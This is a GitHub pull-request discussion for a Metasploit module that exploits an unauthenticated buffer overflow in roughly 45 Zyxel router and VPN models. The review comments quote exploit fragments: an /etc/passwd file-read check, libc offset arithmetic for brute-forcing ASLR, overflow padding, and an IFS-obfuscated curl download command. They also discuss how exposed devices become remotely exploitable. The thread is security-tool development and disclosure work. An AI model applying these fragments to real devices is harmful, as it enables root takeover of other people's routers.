Unauthenticated RCE for multiple Zyxel router
rapid7/metasploit-framework pull request #17388
Opened 2022-12-15 11:22 UTC by shr70

This request adds a new exploit module for a buffer overflow in roughly 45 different Zyxel router and VPN models.
The security advisory can be found [here](https://r.sec-consult.com/24k).

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce`
- [ ] Set RHOST, LHOST and SRVHOST
- [ ] Execute `check`
- [ ] Execute `run`
- [ ] Receive shell as root user

A video of the successfull exploitation can be found here: [https://youtu.be/hbF3LEljxSA](https://youtu.be/hbF3LEljxSA)

2022-12-15 13:21 UTC, jvoisin requested changes

2022-12-15 13:21 UTC, jvoisin commented on documentation/modules/exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.md
> +  3. Do: ```use exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce```
you can use single back-ticks for inline code.

2022-12-15 13:21 UTC, jvoisin commented on documentation/modules/exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.md
> +msf6 exploit(linux/misc/zyxel_multiple_devices_zhttp_lan_rce) > set LHOST XXX.XXX.XXX.XXX
Put an IP address here.

2022-12-15 13:21 UTC, jvoisin commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +        'References' => [
No CVE?

2022-12-15 13:21 UTC, jvoisin commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +        'uri' => '/Export_Log?/etc/passwd',
Shouldn't this be part of another faster exploit offering only an arbitrary file-read instead of a full-blown RCE?

2022-12-15 13:21 UTC, jvoisin commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +    r3_addr = r3_offset + libc_addr
Please put `libc_addr` first.

2022-12-15 13:21 UTC, jvoisin commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +    overflow_url += "\xef\xbe\xad\xde" * 3
This could be randomised I think.

2022-12-15 13:21 UTC, jvoisin commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +  def send_exploit(exploit_url)\
No need for the trailing `\`.

2022-12-15 13:21 UTC, jvoisin commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +      download_cmd = 'curl${IFS}-k${IFS}https:`echo${IFS}//`'
What about ```download_cmd += '-k${IFS}https:`echo${IFS}//`'``` instead?

2022-12-15 13:21 UTC, jvoisin commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +    print_status('Going to bruteforce ASLR, this will take a while...')
What about `print_status('Going to bruteforce ASLR, this might take a while...')` instead?

2022-12-15 15:54 UTC, adfoster-r7 commented on documentation/modules/exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.md
> +msf6 exploit(linux/misc/zyxel_multiple_devices_zhttp_lan_rce) > set LHOST XXX.XXX.XXX.XXX
A masked IP is also fine here :+1:

2022-12-15 16:10 UTC, adfoster-r7 commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +      send_exploit(exploit_url)
> The vulnerability can only be exploited from the LAN side, but does not require authentication. As ASLR is activated, the libc address will be bruteforced.
Thus the webserver will crash until successfull exploitation. On average this process takes 20 minutes.

Does this request synchronously hang for 20 minutes? 👀

2022-12-15 18:54 UTC, EvergreenCartoons commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +        'References' => [
zyxel's psirt don't issue cve's for eol products in my experience, I guess sec-consult had the same problem. maybe rapid7 can get one, iirc r7 are a cna or something.

2022-12-15 18:58 UTC, EvergreenCartoons commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +      send_exploit(exploit_url)
no? it doesn't hang a request synchronously for 20 mins, the "until @payload_sent" loop can take ~20 minutes or so, constantly doing send_exploit requests. it sends one attempt at a time in this loop. 

theres a check in line 235 where you can set a timeout so after (however long you set) the exploit aborts with exceeded timeout.

2022-12-15 20:21 UTC, shr70 commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +        'References' => [
Unfortaunately Zyxel did not agree with us to request a CVE. However, we just requested a CVE via MITRE. Hopefully it can be added in the future.

2022-12-15 20:28 UTC, shr70 commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +        'uri' => '/Export_Log?/etc/passwd',
Yes, this could be build into another module. However, I decided to use this as the check method, as the path of the arbitrary file download is also the buffer for the overflow. Hence, they are likely always fixed at the same time. But anybody can feel free to add another module that only uses the download.

2022-12-15 20:45 UTC, shr70 commented
Added the requested changes

2022-12-21 22:53 UTC, jheysel-r7 commented on documentation/modules/exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.md
> +## Vulnerable Application
@shr70 Do you have a local copy of a vulnerable appliance? If so, would you be able to share some info in this section around how where you downloaded it from / any configuration changes you made in order to exploit?

This would help with testing and merging this PR and for future travellers if any changes ever need to be made to this module. Thanks!

2022-12-22 11:06 UTC, jvoisin commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +        'uri' => '/Export_Log?/etc/passwd',
I'll likely send a PR once this module is merged then :)

2022-12-22 11:10 UTC, shr70 commented on documentation/modules/exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.md
> +## Vulnerable Application
Hi, the list was provided to us by Zyxel. However you can find most firmwares on their website (e.g. [VMG1312-T20B](https://www.zyxel.com/global/en/support/download?model=VMG1312-T20B)).  I just confirmed that version 5.30(ABSB.2)C0 is vulnerable. No configuration changes need to be done. The only requirement is, that the webserver is accesible. In default settings this is only possible from the LAN.

2022-12-22 18:55 UTC, GanuiTeser commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +        'References' => [
As sec-consult said:

> In a recent [Censys.io](http://censys.io/) scan for potentially vulnerable Zyxel products, we found over 5000 devices that seem to be accessible over the Internet.

so does it mean its not local RCE? And exploit works on devices which have web access through zyxel panel?

2022-12-22 20:24 UTC, shr70 commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +        'References' => [
@GanuiTeser I'm not sure what you mean with Zyxel panel. 
For most router this is a local RCE, as the web configuration interface is only exposed on the LAN side per default. However, ISPs usually whitelist their management IP block in the routers firewall for remote debugging purposes. So if you're coming from one of these IP ranges you can also access the web interface remotely. Furthermore you can use e.g. portforwarding to expose the web interface to the WAN. Devices found on Shodan are mostlikely misconfigured and can now be exploited remotely.

2022-12-23 20:29 UTC, GanuiTeser commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +        'References' => [
so, if for example my  web configuration interface exposed to WAN and i can access to my web interface from any ip, therefore it can be exploited?
![testing](https://user-images.githubusercontent.com/121256092/209402115-ef90799a-fa06-4f17-ab9a-990b9760276b.png)
i have tested my router:

> msf6 exploit(linux/misc/zyxel_multiple_devices_zhttp_lan_rce) > run
> 
> [*] Started reverse TCP handler on ***.***.***.278:4444
> [*] Attempting to exploit VMG3312-T20A <= EOL
> [*] Starting up our web service on ***.***.***.182:8080 ...
> [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (***.***.***.182:8080).
> [*] Exploit completed, but no session was created.
> 
as a get it, 8080 port of the router  should be exposed  to the web? 
mine 8080 is open:
Not shown: 991 closed ports

> PORT     STATE    SERVICE
> 22/tcp   filtered ssh
> 445/tcp  filtered microsoft-ds
> 8080/tcp open     http-proxy
what am i missing in order to test it?

2022-12-30 15:09 UTC, jheysel-r7 commented on documentation/modules/exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.md
> +## Vulnerable Application
Hey @shr70 I appreciate the guidance! I'm not overly experienced with emulating firmware so please forgive me. I attempted to run the firmware using the [Firmware Analysis Toolkit](https://github.com/attify/firmware-analysis-toolkit), although it wasn't able to give a network interface for the device, which stopped me from testing. 

Would you be able to list out the steps you took in order to emulate the firmware? We usually like to include detailed target setup instructions in the module documentation - I don't mind editing the documentation if you can just roughly describe here what you did to spin up the firmware 🙏 

<details>
<summary>Firmware Analysis Toolkit Output</summary>

<p>

```
msfuser@ubuntu:~/firmware-analysis-toolkit$ sudo python3 fat.py V530ABSB2C0.bin 
 
                               __           _
                              / _|         | |
                             | |_    __ _  | |_
                             |  _|  / _` | | __|
                             | |   | (_| | | |_
                             |_|    \__,_|  \__|

                Welcome to the Firmware Analysis Toolkit - v0.3
    Offensive IoT Exploitation Training http://bit.do/offensiveiotexploitation
                  By Attify - https://attify.com/  | @attifyme
    
[+] Firmware: V530ABSB2C0.bin
[+] Extracting the firmware...
[+] Image ID: 2
[+] Identifying architecture...
[+] Architecture: mipseb
[+] Building QEMU disk image...
[+] Setting up the network connection, please standby...
[+] Network interfaces: []
[+] All set! Press ENTER to run the firmware...
[+] When running, press Ctrl + A X to terminate qemu
```

</p> 
</details>

2023-01-04 11:51 UTC, shr70 commented on documentation/modules/exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.md
> +## Vulnerable Application
Hi @jheysel-r7, I never emulated the device. I only statically analzyed the firmware. I work for SEC Consult, a Pentestuing company. Hence, we had physical access to a vulnerable device for some time.

2023-01-05 17:31 UTC, cdelafuente-r7 commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +    return Exploit::CheckCode::Unknown
It looks like the `Rex::ConnectionError` exceptions are already handled by `send_request_raw` (called by `send_request_cgi`) and it simply returns `nil`. I believe this exception handler can be removed, since it should never be reached.

https://github.com/rapid7/metasploit-framework/blob/cb682973f7701a276476af7ced304bc9ce7c8fc8/lib/msf/core/exploit/remote/http_client.rb#L406-L408

Also, if `res` is `nil`, the Checkcode should be `Exploit::CheckCode::Unknown` instead of `Exploit::CheckCode::Safe`.

Here is a suggestion for this:
```suggestion
    res = send_request_cgi({
      'uri' => '/Export_Log?/etc/passwd',
      'method' => 'GET',
      'rport' => datastore['RPORT']
    })
    
    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
    return CheckCode::Vulnerable if res.to_s['root:x:0:0:']

    return CheckCode::Safe
```

2023-01-05 17:31 UTC, cdelafuente-r7 commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +      end
It looks like all of this could be replaced by a simple `cmdstager` with the `curl` flavor. This is the current standard and should be used as much as possible.

You can find an updated `cmdstager` documentation [here](https://github.com/rapid7/metasploit-framework/pull/17398/files) (still a WIP PR) or the original documentation [here](https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html).

Please, let us know if you need help or if you have any questions about this.

2023-01-05 19:46 UTC, jmartin-r7 commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +          [ 'PMG5317-T20A <= EOL', {} ],
These do not really add value for module execution, while they would be possible use in a `search` the user is unlikely to even know the model or firmware info.  Since the target does change how the module will execute I would suggest only the standard `Automatic` or `Zyxel device` is really needed here.

```suggestion
        'Targets' => [
          [ 'Zyxel Device', {} ],
```

2023-01-11 15:10 UTC, shr70 commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +      end
Hi, I tried to change my code up in order to use the `cmdstager`. However, I can't figure out how to run the exploit multiple times (required, as it will bruteforce ASLR). My current idea would be to call `execute_cmdstager` until a new session is opened. This should be possible by polling the session count.
Is there a better option?

2023-01-20 14:37 UTC, cdelafuente-r7 commented on modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
> +      end
After looking into the logic again, I agree that the `cmdstager` might be complicated to use. It might not be a good solution here. You can still call `execute_cmdstager` multiple time, but if you have a big payload, it will call `execute_command` multiple times for each call to `execute_cmdstager`. There might be a workaround for this, but I'm not sure it is worth the effort.

2023-02-21 18:25 UTC, jheysel-r7 commented
Hey @shr70. I wasn't able to successfully emulate one of these devices for testing. Would you provide us with a packet capture demonstrating the exploit? If you are able to send one, be sure to remove any sensitive data from it and email msfdev[at]metasploit.com. Thank you.

2023-03-08 13:51 UTC, shr70 commented
@jheysel-r7 I just sent over a sanitized pcap of a successfull exploitation

2023-03-21 19:09 UTC, merged

2023-03-21 19:30 UTC, jheysel-r7 commented
# Release Notes
This PR adds a new exploit module for a buffer overflow in roughly 45 different Zyxel router and VPN models.